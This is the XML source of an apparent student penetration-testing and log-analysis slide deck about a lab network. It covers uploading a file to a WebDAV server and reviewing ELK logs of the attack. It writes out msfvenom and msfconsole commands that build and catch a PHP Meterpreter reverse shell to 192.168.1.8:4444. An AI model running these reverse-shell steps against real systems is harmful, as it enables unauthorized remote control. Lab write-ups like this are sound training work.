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oboto Thin"/>
      <p:regular r:id="rId30"/>
      <p:bold r:id="rId31"/>
      <p:italic r:id="rId32"/>
      <p:boldItalic r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId36"/>
      <p:bold r:id="rId37"/>
      <p:italic r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId40"/>
      <p:bold r:id="rId41"/>
      <p:italic r:id="rId42"/>
      <p:boldItalic r:id="rId43"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light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40A595D-43E4-4172-B24C-AAA0383CB2D1}">
  <a:tblStyle styleId="{F40A595D-43E4-4172-B24C-AAA0383CB2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RobotoLight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RobotoLight-italic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight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bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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Airrick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Airrick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Sarah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 5601 -- ELK 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 80 -- HTTP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 4444 -- Listener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Sarah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Airrick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Sarah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Felicia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Felicia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Felicia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1" name="Google Shape;1281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Felicia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Google Shape;1290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d4cfb2cd4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d4cfb2cd4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Billy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Billy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Seth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Seth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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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9.png"/><Relationship Id="rId4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0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33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Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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36.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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46.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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image" Target="../media/image54.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37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40.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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image" Target="../media/image43.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image49.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image58.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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77.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image76.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image64.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image63.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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2.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image81.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image73.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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0.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image89.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId9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5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118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2" name="Google Shape;92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3" name="Google Shape;9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" name="Google Shape;100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" name="Google Shape;105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" name="Google Shape;112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3" name="Google Shape;113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" name="Google Shape;114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" name="Google Shape;115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" name="Google Shape;122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" name="Google Shape;123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5" name="Google Shape;12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1" name="Google Shape;131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" name="Google Shape;132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3" name="Google Shape;133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" name="Google Shape;134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5" name="Google Shape;13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" name="Google Shape;144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" name="Google Shape;146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9" name="Google Shape;149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1" name="Google Shape;151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" name="Google Shape;153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4" name="Google Shape;154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" name="Google Shape;155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" name="Google Shape;160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1" name="Google Shape;161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3" name="Google Shape;163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5" name="Google Shape;165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6" name="Google Shape;166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7" name="Google Shape;167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" name="Google Shape;168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9" name="Google Shape;169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0" name="Google Shape;170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" name="Google Shape;171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72" name="Google Shape;17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3" name="Google Shape;17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" name="Google Shape;174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5" name="Google Shape;17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6" name="Google Shape;17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" name="Google Shape;182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" name="Google Shape;187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8" name="Google Shape;188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" name="Google Shape;189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0" name="Google Shape;190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2" name="Google Shape;192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93" name="Google Shape;193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6" name="Google Shape;196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9" name="Google Shape;19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02" name="Google Shape;20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" name="Google Shape;209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" name="Google Shape;210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1" name="Google Shape;211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12" name="Google Shape;21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3" name="Google Shape;21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" name="Google Shape;214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9" name="Google Shape;219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0" name="Google Shape;220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" name="Google Shape;221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2" name="Google Shape;222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" name="Google Shape;223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4" name="Google Shape;224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5" name="Google Shape;225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" name="Google Shape;227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8" name="Google Shape;228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5" name="Google Shape;245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6" name="Google Shape;24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7" name="Google Shape;24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" name="Google Shape;248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9" name="Google Shape;249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0" name="Google Shape;250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" name="Google Shape;251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" name="Google Shape;20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2" name="Google Shape;2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" name="Google Shape;23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6" name="Google Shape;26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" name="Google Shape;256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7" name="Google Shape;257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" name="Google Shape;258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9" name="Google Shape;259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" name="Google Shape;260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61" name="Google Shape;261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62" name="Google Shape;262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3" name="Google Shape;263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" name="Google Shape;264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" name="Google Shape;265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2" name="Google Shape;282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83" name="Google Shape;28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4" name="Google Shape;28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5" name="Google Shape;285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6" name="Google Shape;286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" name="Google Shape;287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" name="Google Shape;288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" name="Google Shape;293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4" name="Google Shape;294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5" name="Google Shape;295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6" name="Google Shape;296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7" name="Google Shape;297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8" name="Google Shape;298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9" name="Google Shape;29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0" name="Google Shape;30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" name="Google Shape;302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3" name="Google Shape;303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4" name="Google Shape;304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5" name="Google Shape;305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6" name="Google Shape;306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7" name="Google Shape;307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" name="Google Shape;308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9" name="Google Shape;30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0" name="Google Shape;31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2" name="Google Shape;312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3" name="Google Shape;313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4" name="Google Shape;314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5" name="Google Shape;315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" name="Google Shape;316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8" name="Google Shape;318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9" name="Google Shape;31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0" name="Google Shape;32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2" name="Google Shape;322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3" name="Google Shape;323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4" name="Google Shape;324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5" name="Google Shape;325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" name="Google Shape;326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7" name="Google Shape;327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" name="Google Shape;328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9" name="Google Shape;32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0" name="Google Shape;33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4" name="Google Shape;334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5" name="Google Shape;335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6" name="Google Shape;336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7" name="Google Shape;337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8" name="Google Shape;338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9" name="Google Shape;339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0" name="Google Shape;340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41" name="Google Shape;341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2" name="Google Shape;342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3" name="Google Shape;343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4" name="Google Shape;344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5" name="Google Shape;345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6" name="Google Shape;34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7" name="Google Shape;34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" name="Google Shape;348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9" name="Google Shape;349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0" name="Google Shape;350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51" name="Google Shape;351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2" name="Google Shape;352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3" name="Google Shape;353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4" name="Google Shape;354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" name="Google Shape;355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6" name="Google Shape;35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8" name="Google Shape;358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9" name="Google Shape;359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" name="Google Shape;360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61" name="Google Shape;361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4" name="Google Shape;364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" name="Google Shape;365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6" name="Google Shape;36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" name="Google Shape;368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9" name="Google Shape;369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0" name="Google Shape;370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71" name="Google Shape;371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4" name="Google Shape;374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Google Shape;375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6" name="Google Shape;37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1" name="Google Shape;381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82" name="Google Shape;382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3" name="Google Shape;383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4" name="Google Shape;384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5" name="Google Shape;385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" name="Google Shape;386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8" name="Google Shape;388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" name="Google Shape;391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93" name="Google Shape;393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" name="Google Shape;395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8" name="Google Shape;398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1" name="Google Shape;401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" name="Google Shape;402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03" name="Google Shape;403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6" name="Google Shape;406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8" name="Google Shape;408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1" name="Google Shape;411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2" name="Google Shape;412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13" name="Google Shape;413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" name="Google Shape;415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6" name="Google Shape;416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" name="Google Shape;417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8" name="Google Shape;418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1" name="Google Shape;421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" name="Google Shape;422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23" name="Google Shape;423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" name="Google Shape;425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8" name="Google Shape;428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9" name="Google Shape;429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0" name="Google Shape;430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31" name="Google Shape;43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2" name="Google Shape;432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3" name="Google Shape;433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4" name="Google Shape;434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8" name="Google Shape;438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9" name="Google Shape;439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43" name="Google Shape;443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4" name="Google Shape;444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51" name="Google Shape;451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3" name="Google Shape;453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4" name="Google Shape;454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5" name="Google Shape;455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6" name="Google Shape;456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7" name="Google Shape;457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9" name="Google Shape;459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3" name="Google Shape;463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4" name="Google Shape;46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5" name="Google Shape;465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6" name="Google Shape;46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7" name="Google Shape;467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8" name="Google Shape;468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9" name="Google Shape;469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4" name="Google Shape;474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5" name="Google Shape;475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0" name="Google Shape;480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1" name="Google Shape;481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4" name="Google Shape;484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5" name="Google Shape;485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6" name="Google Shape;486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1" name="Google Shape;491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2" name="Google Shape;492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3" name="Google Shape;493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4" name="Google Shape;494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5" name="Google Shape;495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6" name="Google Shape;496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1" name="Google Shape;501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2" name="Google Shape;502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03" name="Google Shape;503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0" name="Google Shape;510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1" name="Google Shape;511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2" name="Google Shape;512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3" name="Google Shape;513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4" name="Google Shape;514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5" name="Google Shape;515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" name="Google Shape;521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2" name="Google Shape;522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9" name="Google Shape;529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0" name="Google Shape;530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1" name="Google Shape;531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2" name="Google Shape;532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3" name="Google Shape;533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4" name="Google Shape;534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9" name="Google Shape;539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0" name="Google Shape;540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1" name="Google Shape;541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1" name="Google Shape;31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4" name="Google Shape;34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7" name="Google Shape;37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8" name="Google Shape;548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9" name="Google Shape;549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0" name="Google Shape;550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1" name="Google Shape;551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2" name="Google Shape;552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3" name="Google Shape;553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8" name="Google Shape;558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9" name="Google Shape;559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0" name="Google Shape;560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7" name="Google Shape;567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8" name="Google Shape;568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9" name="Google Shape;569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0" name="Google Shape;570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1" name="Google Shape;571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2" name="Google Shape;572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7" name="Google Shape;577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8" name="Google Shape;578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9" name="Google Shape;579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1" name="Google Shape;581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9" name="Google Shape;589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0" name="Google Shape;590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1" name="Google Shape;591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2" name="Google Shape;592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3" name="Google Shape;593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1" name="Google Shape;601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3" name="Google Shape;603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1" name="Google Shape;611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2" name="Google Shape;612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4" name="Google Shape;614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5" name="Google Shape;615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6" name="Google Shape;616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2" name="Google Shape;622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3" name="Google Shape;623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5" name="Google Shape;625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3" name="Google Shape;633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4" name="Google Shape;634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6" name="Google Shape;636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7" name="Google Shape;637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8" name="Google Shape;638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3" name="Google Shape;643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4" name="Google Shape;644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5" name="Google Shape;645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7" name="Google Shape;647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5" name="Google Shape;655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6" name="Google Shape;656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8" name="Google Shape;658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9" name="Google Shape;659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0" name="Google Shape;660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7" name="Google Shape;667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8" name="Google Shape;668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9" name="Google Shape;669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0" name="Google Shape;670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0" name="Google Shape;680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81" name="Google Shape;681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2" name="Google Shape;682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3" name="Google Shape;683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4" name="Google Shape;684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5" name="Google Shape;685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6" name="Google Shape;686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2" name="Google Shape;692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3" name="Google Shape;693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4" name="Google Shape;694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5" name="Google Shape;695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5" name="Google Shape;705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6" name="Google Shape;706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7" name="Google Shape;707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8" name="Google Shape;708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9" name="Google Shape;709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0" name="Google Shape;710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1" name="Google Shape;711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7" name="Google Shape;717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8" name="Google Shape;718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9" name="Google Shape;719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1" name="Google Shape;721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0" name="Google Shape;730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1" name="Google Shape;731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2" name="Google Shape;732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3" name="Google Shape;733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4" name="Google Shape;734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5" name="Google Shape;735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6" name="Google Shape;736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2" name="Google Shape;742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3" name="Google Shape;743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4" name="Google Shape;744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6" name="Google Shape;746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5" name="Google Shape;755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6" name="Google Shape;756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7" name="Google Shape;757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8" name="Google Shape;75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9" name="Google Shape;759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0" name="Google Shape;760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9" name="Google Shape;769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1" name="Google Shape;771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2" name="Google Shape;42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" name="Google Shape;4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4" name="Google Shape;4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6" name="Google Shape;46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9" name="Google Shape;49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50" name="Google Shape;50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3" name="Google Shape;783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4" name="Google Shape;784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5" name="Google Shape;785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6" name="Google Shape;78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7" name="Google Shape;787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8" name="Google Shape;788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7" name="Google Shape;797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9" name="Google Shape;799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2" name="Google Shape;812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3" name="Google Shape;813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4" name="Google Shape;81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5" name="Google Shape;815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6" name="Google Shape;816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5" name="Google Shape;825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7" name="Google Shape;827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9" name="Google Shape;829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9" name="Google Shape;839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0" name="Google Shape;840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1" name="Google Shape;841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2" name="Google Shape;84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3" name="Google Shape;843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4" name="Google Shape;844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3" name="Google Shape;853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5" name="Google Shape;855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7" name="Google Shape;857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6" name="Google Shape;866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7" name="Google Shape;867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8" name="Google Shape;868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9" name="Google Shape;869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0" name="Google Shape;870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3" name="Google Shape;883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5" name="Google Shape;885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7" name="Google Shape;897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8" name="Google Shape;898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9" name="Google Shape;899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0" name="Google Shape;900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1" name="Google Shape;901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4" name="Google Shape;914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6" name="Google Shape;916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8" name="Google Shape;928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9" name="Google Shape;92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0" name="Google Shape;930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1" name="Google Shape;93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2" name="Google Shape;932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5" name="Google Shape;945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7" name="Google Shape;947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9" name="Google Shape;949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9" name="Google Shape;959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0" name="Google Shape;960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1" name="Google Shape;961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2" name="Google Shape;96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3" name="Google Shape;963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6" name="Google Shape;976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8" name="Google Shape;978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0" name="Google Shape;980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Google Shape;989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1" name="Google Shape;991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2" name="Google Shape;992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3" name="Google Shape;99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5" name="Google Shape;995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7" name="Google Shape;997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9" name="Google Shape;999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0" name="Google Shape;1000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1" name="Google Shape;100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4" name="Google Shape;1004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7" name="Google Shape;1007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13" name="Google Shape;1013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4" name="Google Shape;101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15" name="Google Shape;1015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8" name="Google Shape;1018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" name="Google Shape;65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" name="Google Shape;67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" name="Google Shape;68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4" name="Google Shape;74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" name="Google Shape;76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" name="Google Shape;77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" name="Google Shape;78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" name="Google Shape;79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" name="Google Shape;83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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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8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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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8.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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raw.io" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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4" name="Google Shape;1024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Unauthorized File Upload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140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MSFVenom</a:t>
            </a:r>
            <a:endParaRPr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The instructions that we found within secret_folder/connect_to_corp_server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6" name="Google Shape;1146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47" name="Google Shape;1147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8" name="Google Shape;1148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9" name="Google Shape;1149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Allowed us to create a listener file on the WebDav server.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51" name="Google Shape;1151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52" name="Google Shape;1152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3" name="Google Shape;1153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4" name="Google Shape;1154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63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Commands</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF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Msfvenom -p  php/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f raw -o shell2.php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6" name="Google Shape;1156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m -p php\meterp &#10;[-1 No platform selected, choosing Ms f; *lat form; fro. the payload &#10;[ •l NO arch selected, selecting arch: php from the payload &#10;No encoder or badchars specified, outputting raw payload &#10;payload size: I | 12 bytes &#10;Saved as: she112.php &#10;o she IQ . php " id="1157" name="Google Shape;1157;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="33511" l="0" r="0" t="10933"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1404325" y="3895425"/>
            <a:ext cx="5924551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• of tweMa &#10;@ 192.168.1.105',vebdkwy &#10;Index of /webdav &#10;Nome &#10;shellphp &#10;Size pgsuiptiun &#10;2019-05-07 18:19 43 &#10;2021-05-04 00:25 1.1K &#10;2021-05-04 00:34 1.1K &#10;ApacheÆ.4.29 (Ubuntu) sewer at 192.168.1.105 Port 80 " id="1158" name="Google Shape;1158;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="43731" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328875" y="3473000"/>
            <a:ext cx="1443800" cy="126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Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164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64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64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Msfconsole and Meterpreter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67" name="Google Shape;1167;p64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68" name="Google Shape;1168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9" name="Google Shape;1169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0" name="Google Shape;1170;p64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71" name="Google Shape;1171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72" name="Google Shape;1172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3" name="Google Shape;1173;p64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64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Allowed us to access the entire system through meterpreter and another shell (if desired) once our listener file was opened. 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75" name="Google Shape;1175;p64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76" name="Google Shape;1176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77" name="Google Shape;1177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8" name="Google Shape;1178;p64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64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Commands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msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF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set payload php meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF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set LHOST 192.168.1.8</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF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exploit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0" name="Google Shape;1180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Listing: &#10;49755/ruxr-xr &#10;40755/ rwr-xr &#10;40755,' ruxr &#10;.xr.x &#10;lee644/r*-r--r-- &#10;407SS,'rwxr-xr &#10;46755,'r-wxr.xr.x &#10;46SSS/r-x &#10;407SS,'rwr- &#10;49755,' ruxr &#10;41777/ ruxrvxrvx &#10;407SS,'ruxr x &#10;cat &#10;Size &#10;4096 &#10;4096 &#10;4696 &#10;4696 &#10;54710145 &#10;34636414 &#10;4096 &#10;.1096 &#10;16384 &#10;4696 &#10;4096 &#10;4096 &#10;BEO &#10;4696 &#10;4096 &#10;4696 &#10;2065694720 &#10;4096 &#10;4696 &#10;4096 &#10;8298232 &#10;8257272 &#10;flag. txt &#10;T ype &#10;fit &#10;La St &#10;2019-05-01 &#10;202e-ß9-e3 &#10;.28 &#10;2019-05-07 &#10;262e•os-19 &#10;202e-ß9-e3 &#10;2019-05.e7 &#10;2019-05-07 &#10;2619-05-0 &#10;2019-05-e7 &#10;2619-05.e7 &#10;2019-05-e7 &#10;2621-0S-03 &#10;202e-ß5-19 &#10;2021-05-03 &#10;2e19.ß5.e7 &#10;2019-05-07 &#10;2019-05-e7 &#10;2021-05-ea &#10;2619-05-01 &#10;2e21-01-28 &#10;2019-05-07 &#10;2619-05.e7 &#10;2019-05-e7 &#10;.25. &#10;.07. &#10;14:10. &#10;14:10. &#10;18: 01 &#10;13; 12. &#10;14:10. &#10;.02. &#10;.16. &#10;12. &#10;10. &#10;12. &#10;18. &#10;14. &#10;.23 &#10;.15 &#10;.55 &#10;- 0400 &#10;_ 0400 &#10;0400 &#10;• 050B &#10;-0400 &#10;•6400 &#10;•6400 &#10;0400 &#10;.0400 &#10;•6400 &#10;- 0400 &#10;-6400 &#10;_ 0400 &#10;0400 &#10;-0400 &#10;•6400 &#10;-0400 &#10;•6400 &#10;-0400 &#10;-0500 &#10;.64ao &#10;e 400 &#10;bin &#10;boot &#10;dev &#10;etc &#10;flag. txt &#10;initrd.img &#10;init rd. img.old &#10;I ib64 &#10;tost+found &#10;media &#10;mnt &#10;opt &#10;proc &#10;root &#10;S bin &#10;s nap &#10;suap. i. &#10;Sys &#10;t mp &#10;us r &#10;vagrant &#10;var &#10;vmtinuz " id="1181" name="Google Shape;1181;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="-10" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="2709099"/>
            <a:ext cx="2371501" cy="193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6" name="Google Shape;118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Google Shape;1187;p65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8" name="Google Shape;1188;p6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189" name="Google Shape;1189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95" name="Google Shape;1195;p66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96" name="Google Shape;1196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66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="20774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port scan.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8" name="Google Shape;1198;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3712025" y="675975"/>
            <a:ext cx="4911000" cy="10800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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port scan occured b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etween 12:00-2:00am on 05/04/2021</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>618 packets were sent</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill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400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Historically, port 4444 is used specifically for listening and does not have other traffic running through it</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1199" name="Google Shape;119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01" name="Google Shape;120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077371"/>
            <a:ext cx="9144000" cy="2459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07" name="Google Shape;1207;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="2882400" cy="7023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Answer the following questions in bullet points under the screenshot if space allows. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="700"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="700"/>
              <a:t>Otherwise, add the answers to speaker notes. </a:t>
            </a:r>
            <a:endParaRPr sz="7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208" name="Google Shape;1208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67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0" name="Google Shape;1210;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2666025" y="665100"/>
            <a:ext cx="67881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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 23:00-23:30 on May 3, 2021.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>30,612 requests were made.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>company_folders/secret_folder is the directory trying to be accessed. It contains a  file on how to access the WebDav server and the hash for Ryan’s password.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1211" name="Google Shape;121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6025" y="835150"/>
            <a:ext cx="424701" cy="33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Google Shape;1212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10 HTTP -1•十“믈•1*|1 ECS &#10;9216홀1.1051'″)因 m•.,O년~-니0* &#10;hug: 1/,9216올 1105t 19216회-1 %,Camp믈|까」國리회 secret」Older &#10;h테p;h19216되,1051 " id="1213" name="Google Shape;1213;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="54755" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="125150" y="1467825"/>
            <a:ext cx="8041200" cy="135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67"/>
